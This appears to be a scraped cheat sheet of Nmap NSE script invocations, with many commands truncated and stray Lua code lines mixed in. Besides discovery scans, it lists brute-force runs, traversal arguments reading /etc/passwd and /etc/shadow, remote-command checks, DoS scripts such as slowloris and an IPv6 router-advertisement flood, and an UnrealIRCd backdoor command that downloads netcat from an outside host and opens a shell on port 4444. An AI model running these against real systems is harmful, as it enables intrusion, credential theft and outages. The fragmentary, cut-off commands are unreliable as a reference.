Some really useful NSE – Nmap Scripting Engine scripts.
Keyword search (ctrl+F) to find items related to what you need like smb, nse or even geolocation with IP Addresses and google maps.
— nmap –script acarsd-info –script-args “acarsd-info.timeout=10,acarsd-info.bytes=512” -p
— nmap -p 548 –script afp-brute
— nmap -sS -sV -p 548 –script=afp-ls target
— nmap -p 8009
— nmap -p 8009
— nmap -p 8009
— nmap -p 8009
— nmap -p 8009
— nmap -Pn -sU -sV –script allseeingeye-info -p
— nmap –script amqp-info -p5672
— nmap –script asn-query [–script-args dns=
— nmap -sU –script backorifice-brute
— nmap -p 8333 –script bitcoin-getaddr
— nmap -p 8333 –script bitcoin-info
— nmap -p 8332 –script bitcoinrpc-info –script-args creds.global=
— nmap –script bittorrent-discovery –script-args newtargets,bittorrent-discovery.torrent=
— nmap -sU -p 8611,8612 –script bjnp-discover
— nmap –script broadcast-ataoe-discover -e
— nmap –script=broadcast-avahi-dos
— nmap –script broadcast-bjnp-discover
— nmap –script db2-discover
— nmap -6 –script broadcast-dhcp6-discover
— nmap –script broadcast-dhcp-discover
— nmap –script=broadcast-dns-service-discovery
— nmap –script=broadcast-dropbox-listener
— nmap –script=broadcast-dropbox-listener –script-args=newtargets -Pn
— nmap –script=broadcast-eigrp-discovery
— nmap –script=broadcast-eigrp-discovery
— nmap –script broadcast-igmp-discovery
— nmap –script broadcast-igmp-discovery -e wlan0
— nmap –script broadcast-igmp-discovery
— nmap –script broadcast-listener
— nmap –script broadcast-listener -e eth0
— nmap –script broadcast-ms-sql-discover
— nmap –script broadcast-ms-sql-discover,ms-sql-info –script-args=newtargets
— nmap –script=broadcast-netbios-master-browser
— nmap –script=broadcast-ospf2-discover
— nmap –script=broadcast-ospf2-discover -e wlan0
— nmap –script broadcast-pc-anywhere
— nmap –script broadcast-pc-duo
— nmap –script broadcast-pim-discovery
— nmap –script broadcast-pim-discovery -e eth1
— nmap –script broadcast-pppoe-discover
— nmap –script broadcast-rip-discover
— nmap –script broadcast-ripng-discover
— nmap -e eth0 –script broadcast-sonicwall-discover
— nmap –script broadcast-sybase-asa-discover
— nmap –script broadcast-tellstick-discover
— nmap –script broadcast-versant-locate
— nmap –script broadcast-wake-on-lan –script-args broadcast-wake-on-lan.MAC=’00:12:34:56:78:9A’
— nmap –script broadcast-wpad-discover
— nmap –script broadcast-wsdd-discover
— nmap –script broadcast-xdmcp-discover
— nmap -p 9160
— nmap -p 9160
— nmap –script=cics-enum -p 23
— nmap –script=cics-enum –script-args=idlist=default_cics.txt,
— nmap –script=cics-info -p 23
— nmap –script=cics-info –script-args cics-info.commands=’logon applid(coolcics)’,
— nmap –script=cics-user-brute -p 23
— nmap –script=cics-user-brute –script-args userdb=users.txt,
— nmap –script=cics-user-enum -p 23
— nmap –script=cics-user-enum –script-args userdb=users.txt,
— nmap –script=citrix-brute-xml –script-args=userdb=
— nmap –script=citrix-enum-apps-xml -p 80,443,8080
— nmap –script=citrix-enum-servers-xml -p 80,443,8080
— nmap -sV –script clamav-exec
— nmap –script clamav-exec –script-args cmd=’scan’,scandb=’files.txt’
— nmap –script clamav-exec –script-args cmd=’shutdown’
— nmap -p 5984 –script “couchdb-databases.nse”
— nmap -p 5984 –script “couchdb-stats.nse”
— nmap -p 631
— nmap -p 631
— nmap -p 2401 –script cvs-brute
— nmap -p 2401 –script cvs-brute-repository
— nmap –script deluge-rpc-brute -p 58846
— nmap -sU -p 67 –script=dhcp-discover
— nmap -p 2628
— nmap -p 3632
— nmap –script dns-blacklist –script-args=’dns-blacklist.ip=
— nmap -sn
— nmap –script dns-brute –script-args dns-brute.domain=foo.com,dns-brute.threads=6,dns-brute.hostlist=./hostfile.txt,newtargets -sS -p 80
— nmap –script dns-brute www.foo.com
— nmap -sU -p 53 –script dns-cache-snoop.nse –script-args ‘dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}’
— nmap -sn -Pn ns1.example.com –script dns-check-zone –script-args=’dns-check-zone.domain=example.com’
— nmap -sU -p 53 –script dns-client-subnet-scan –script-args \
— nmap –script dns-client-subnet-scan –script-args \
— nmap -sU –script dns-fuzz –script-args timelimit=2h
— nmap –script dns-ip6-arpa-scan –script-args=’prefix=2001:0DB8::/48′
— nmap -sU -p 53
— nmap -sSU -p 53 –script dns-nsec-enum –script-args dns-nsec-enum.domains=example.com
— nmap -sSU -p 53 –script dns-nsid
— nmap -sU -p 53 –script=dns-random-srcport
— nmap -sU -p 53 –script=dns-random-txid
— nmap -sU -p 53 –script=dns-recursion
— nmap –script=dns-service-discovery -p 5353
— nmap –script dns-srv-enum –script-args “dns-srv-enum.domain=’example.com'”
— nmap -sU -p 53 –script=dns-update –script-args=dns-update.hostname=foo.example.com,dns-update.ip=192.0.2.1
— nmap -sn -PN –script=dns-zeustracker
— nmap –script dns-zone-transfer.nse \
— nmap –script domcon-brute -p 2050
— nmap -p 2050
— nmap –script domino-enum-users -p 1352
— nmap –script dpap-brute -p 8770
— nmap -p 50000 –script drda-brute
— sudo nmap -PN -p445,443 –script duplicates,nbstat,ssl-cert
— nmap -e interface –script eap-info [–script-args=”eap-info.identity=0-user,eap-info.scan={13,50}”]
— nmap –script enip-info -sU -p 44818
— nmap -p 4369 –script epmd-info
— nmap -p 3031
— nmap -sn -Pn –script fcrdns
— nmap -sV –script fingerprint-strings
— nmap –script=firewalk –traceroute
— nmap –script=firewalk –traceroute –script-args=firewalk.max-retries=1
— nmap –script=firewalk –traceroute –script-args=firewalk.probe-timeout=400ms
— nmap –script=firewalk –traceroute –script-args=firewalk.max-probed-ports=7
— nmap –script firewall-bypass
— nmap –script firewall-bypass –script-args firewall-bypass.helper=”ftp”, firewall-bypass.targetport=22
— nmap –script flume-master-info -p 35871 host
— nmap –script fox-info.nse -p 1911
— nmap -sU -p 2302 –script=freelancer-info
— nmap –script ftp-brute -p 21
— nmap –script ftp-proftpd-backdoor -p 21
— nmap –script ftp-vsftpd-backdoor -p 21
— nmap –script ftp-vuln-cve2010-4221 -p 21
— nmap –script ganglia-info –script-args ganglia-info.timeout=60,ganglia-info.bytes=1000000 -p
— nmap -p 19150
— nmap -p 70 –script gopher-ls –script-args gopher-ls.maxfiles=100
— nmap -p 2947
— nmap –script hadoop-datanode-info.nse -p 50075 host
— nmap –script hadoop-jobtracker-info [–script-args=hadoop-jobtracker-info.userinfo] -p 50030 host
— nmap –script hadoop-namenode-info -p 50070 host
— nmap –script hadoop-secondary-namenode-info -p 50090 host
— nmap –script hadoop-tasktracker-info -p 50060 host
— nmap –script hbase-master-info -p 60010 host
— nmap –script hbase-region-info -p 60030 host
— nmap –script hnap-info -p80,8080
— nmap –script hostmap-bfk –script-args hostmap-bfk.prefix=hostmap-
— nmap –script hostmap-crtsh –script-args ‘hostmap-crtsh.prefix=hostmap-‘
— nmap -sn –script hostmap-crtsh
— nmap –script hostmap-robtex -sn -Pn scanme.nmap.org
— nmap –script=http-affiliate-id.nse –script-args http-affiliate-id.url-path=/website
— nmap –script=http-apache-negotiation –script-args http-apache-negotiation.root=/root/
* https://github.com/michenriksen/nmap-scripts
— nmap -p 80 –script http-auth-finder
— nmap –script http-auth [–script-args http-auth.path=/login] -p80
— nmap -sV –script http-awstatstotals-exec.nse –script-args ‘http-awstatstotals-exec.cmd=”uname -a”, http-awstatstotals-exec.uri=/awstats/index.php’
— nmap -sV –script http-awstatstotals-exec.nse
— nmap -p80,8080 –script http-axis2-dir-traversal –script-args ‘http-axis2-dir-traversal.file=../../../../../../../etc/issue’
— nmap -p80 –script http-axis2-dir-traversal
— nmap –script=http-backup-finder
— nmap –script http-barracuda-dir-traversal –script-args http-max-cache-size=5000000 -p
— nmap -p
— nmap –script http-brute -p 80
— nmap -p80,443 –script http-cakephp-version
— nmap –script http-chrono
— nmap -p 443 –script http-cisco-anyconnect
— nmap –script=http-config-backup
— nmap -p 443 –script http-cookie-flags
— nmap -p 80 –script http-cors
— nmap -p80 –script http-default-accounts host/ip
— nmap -sV –script http-dlink-backdoor
— nmap –script http-domino-enum-passwords -p 80
— nmap –script=http-drupal-enum-users –script-args http-drupal-enum-users.root=”/path/”
— nmap –script http-exif-spider -p80,443
— nmap –script=http-favicon.nse \
— nmap –script http-fetch –script-args ‘paths={/robots.txt,/favicon.ico}’
— nmap –script http-fetch –script-args ‘paths=.html’
— nmap –script http-fetch –script-args ‘url=/images,paths={.jpg,.png,.gif}’
— nmap –script http-form-brute -p 80
— nmap –script http-form-fuzzer –script-args ‘http-form-fuzzer.targets={1={path=/},2={path=/register.html}}’ -p 80
— nmap
— nmap –script http-generator [–script-args http-generator.path=
— nmap -p80 www.example.com –script http-gitweb-projects-enum
— nmap -p80 –script http-google-malware
— nmap -p 80 www.example.com –script http-grep –script-args=’match=”[A-Za-z0-9%.%%%+%-]+@[A-Za-z0-9%.%%%+%-]+%.%w%w%w?%w?”,breakonmatch’
— nmap -p 80 www.example.com –script http-grep –script-args ‘http-grep.builtins ={“mastercard”, “discover”}, http-grep.url=”example.html”‘
— nmap -sn -Pn –script http-icloud-findmyiphone –script-args=’username=
— nmap -sn -Pn –script http-icloud-sendmsg –script-args=”username=
— nmap -sn -Pn –script http-icloud-sendmsg –script-args=”username=
— nmap -p80 –script http-iis-short-name-brute
— nmap –script http-iis-webdav-vuln -p80,8080
return nmap.verbosity() > 0 and “WebDAV is ENABLED. No protected folder found; check not run. If you know a protected folder, add –script-args=webdavfolder=
— nmap -sV –script http-joomla-brute
— nmap -sV –script http-joomla-brute
— nmap -p 80 –script http-jsonp-detection
— nmap -p80 –script http-litespeed-sourcecode-download –script-args http-litespeed-sourcecode-download.uri=/phpinfo.php
— nmap -p8088 –script http-litespeed-sourcecode-download
— nmap -n -p 80 –script http-ls test-debit.free.fr
— nmap -p80 –script http-majordomo2-dir-traversal
— nmap –script http-methods
— nmap –script http-methods –script-args http-methods.url-path=’/website’
— nmap -p 80 –script http-ntlm-info –script-args http-ntlm-info.root=/root/
— nmap –script http-open-proxy.nse \
— nmap –script=http-open-redirect
— nmap –script http-passwd –script-args http-passwd.root=/test/
— nmap -p80 –script http-phpmyadmin-dir-traversal –script-args=”dir=’/pma/’,file=’../../../../../../../../etc/passwd’,outfile=’passwd.txt'”
— nmap -p80 –script http-phpmyadmin-dir-traversal
— nmap –script=http-phpself-xss -p80
— nmap -sV –script http-self-xss
— nmap –script http-proxy-brute -p 8080
local arg_url = stdnse.get_script_args(SCRIPT_NAME .. ‘.url’) or ‘http://scanme.nmap.org/’
— nmap -p 80
— nmap –script http-qnap-nas-info -p
— nmap –script http-rfi-spider -p80
— nmap –script http-robtex-reverse-ip –script-args http-robtex-reverse-ip.host=’
— nmap –script http-robtex-shared-ns
— nmap -p
— nmap -sV -p- –script http-shellshock
— nmap -sV -p- –script http-shellshock –script-args uri=/cgi-bin/bin,cmd=ls
— nmap –script http-sitemap-generator -p 80
— nmap –script http-slowloris-check
— nmap –script http-slowloris –max-parallelism 400
slowloris:set_timeout(math.min(200 * 1000, end_time – nmap.clock_ms())) — Set a long timeout so our socket doesn’t timeout while it’s waiting. At the same time left for script execution is maximum limit.
— nmap –script http-trace -d
— nmap –script=http-traceroute
— nmap –script=http-unsafe-output-escaping
— nmap –script http-vhosts -p 80,8080,443
— nmap –script http-virustotal –script-args=’http-virustotal.apikey=”
— nmap -p 54340 –script http-vlcstreamer-ls
— nmap –script http-vmware-path-vuln -p80,443,8222,8333
— nmap -sV –script http-vuln-cve2006-3392
— nmap -p80 –script http-vuln-cve2006-3392 –script-args http-vuln-cve2006-3392.file=/etc/shadow
— nmap –script=http-vuln-cve2009-3960 –script-args http-http-vuln-cve2009-3960.root=”/root/”
— nmap –script=http-vuln-cve2010-0738 –script-args ‘http-vuln-cve2010-0738.paths={/path1/,/path2/}’
— nmap –script http-vuln-cve2010-2861
— nmap –script http-vuln-cve2011-3192.nse [–script-args http-vuln-cve2011-3192.hostname=nmap.scanme.org] -pT:80,443
— nmap –script http-vuln-cve2011-3368
— nmap -sV –script http-vuln-cve2012-1823
— nmap -p80 –script http-vuln-cve2012-1823 –script-args http-vuln-cve2012-1823.uri=/test.php
— nmap -sV –script http-vuln-cve2013-0156
— nmap -sV –script http-vuln-cve2013-0156 –script-args uri=”/test/”
— nmap -sV –script http-vuln-cve2013-7091
— nmap -p80 –script http-vuln-cve2013-7091 –script-args http-vuln-cve2013-7091=/ZimBra
— nmap -p 443 –script http-vuln-cve2014-2126
— nmap -p 443 –script http-vuln-cve2014-2127
— nmap -p 443 –script http-vuln-cve2014-2128
— nmap -p 443 –script http-vuln-cve2014-2129
— nmap –script http-vuln-cve2014-3704 –script-args http-vuln-cve2014-3704.cmd=”uname -a”,http-vuln-cve2014-3704.uri=”/drupal”
— nmap –script http-vuln-cve2014-3704 –script-args http-vuln-cve2014-3704.uri=”/drupal”,http-vuln-cve2014-3704.cleanup=false
— nmap –script http-vuln-cve2014-8877 –script-args http-vuln-cve2014-8877.cmd=”whoami”,http-vuln-cve2014-8877.uri=”/wordpress”
— nmap –script http-vuln-cve2014-8877
— nmap –script=http-vuln-cve2015-1427 –script-args command= ‘ls’
— nmap –script http-vuln-cve2017-1001000 –script-args http-vuln-cve2017-1001000=”uri”
— nmap –script http-vuln-cve2017-1001000
— nmap -p
— nmap -p 16992 –script http-vuln-cve2017-5689
— nmap
— nmap -sV –script http-vuln-wnr1000-creds
— nmap -p80 –script http-waf-detect
— nmap -p80 –script http-waf-detect –script-args=”http-waf-detect.aggro,http-waf-detect.uri=/testphp.vulnweb.com/artists.php” www.modsecurity.org
— nmap –script=http-waf-fingerprint
— nmap –script=http-waf-fingerprint –script-args http-waf-fingerprint.intensive=1
— nmap –script http-webdav-scan -p80,8080
— nmap -sV –script http-wordpress-brute
— nmap -sV –script http-wordpress-brute
— nmap -p80 –script http-wordpress-users
— nmap -sV –script http-wordpress-users –script-args limit=50
— nmap -sU -p 4569
— nmap -p 1344
— nmap -sU -p 500 –script ike-version
— nmap -p 143,993 –script imap-brute
— nmap -p 143,993 –script imap-ntlm-info
— nmap –script informix-brute -p 9088
— nmap -p 9088
— nmap -p 9088
— sudo nmap -sn
— nmap –script ip-geolocation-geoplugin
— nmap –script ip-geolocation-ipinfodb
— nmap -sn -Pn –script ip-geolocation-geoplugin,ip-geolocation-map-bing –script-args ip-geolocation-map-bing.api_key=[redacted],ip-geolocation-map-bing.map_path=map.png
— nmap -sn -Pn –script ip-geolocation-geoplugin,ip-geolocation-map-google –script-args ip-geolocation-map-google.api_key=[redacted],ip geolocation-map-google.map_path=map.png
— nmap -sn -Pn –script ip-geolocation-geoplugin,ip-geolocation-map-kml –script-args ip-geolocation-map-kml.map_path=map.kml
— nmap –script ip-geolocation-maxmind
— nmap –script ip-https-discover
— nmap –script ipidseq [–script-args probeport=port] target
— nmap -sU –script ipmi-brute -p 623
— nmap -sU –script ipmi-cipher-zero -p 623
— nmap -sU –script ipmi-version -p 623
— nmap –script=ipv6-multicast-mld-list local arg_interface = stdnse.get_script_args(SCRIPT_NAME .. “.interface”) or nmap.get_interface()
— nmap -6 –script ipv6-ra-flood.nse
— nmap -6 –script ipv6-ra-flood.nse –script-args ‘interface=
— nmap -6 –script ipv6-ra-flood.nse –script-args ‘interface=
if not stdnse.get_script_args(SCRIPT_NAME .. “.interface”) and not nmap.get_interface() then
local arg_interface = stdnse.get_script_args(SCRIPT_NAME .. “.interface”) or nmap.get_interface()
— nmap -p 6667 –script=irc-botnet-channels
— nmap -p 6667 –script=irc-botnet-channels –script-args ‘irc-botnet-channels.channels={chan1,chan2,chan3}’
— nmap –script irc-brute -p 6667
— nmap –script irc-sasl-brute -p 6667
$ nmap -d -p6667 –script=irc-unrealircd-backdoor.nse –script-args=irc-unrealircd-backdoor.command=’wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh’
— nmap -p 3205
— nmap –script knx-gateway-discover -e eth0
— nmap -p 88 –script krb5-enum-users –script-args krb5-enum-users.realm=’test’
— nmap -p 389 –script ldap-brute –script-args ldap.base='”cn=users,dc=cqure,dc=net”‘
— nmap -p 636 –script ldap-novell-getpass –script-args \
— nmap -p 389 –script ldap-rootdse
— nmap -p 389 –script ldap-search –script-args ‘ldap.username=”cn=ldaptest,cn=users,dc=cqure,dc=net”,ldap.password=ldaptest,
— nmap -p 389 –script ldap-search –script-args ‘ldap.username=”cn=ldaptest,cn=users,dc=cqure,dc=net”,ldap.password=ldaptest,
— nmap -sU -p 9100 –script=lexmark-config
— nmap –script llmnr-resolve –script-args ‘llmnr-resolve.hostname=examplename’ -e wlan0
— nmap -e
— nmap –script lu-enum -p 23
— nmap –script lu-enum –script-args lulist=lus.txt,
— nmap -p 7210 –script maxdb-info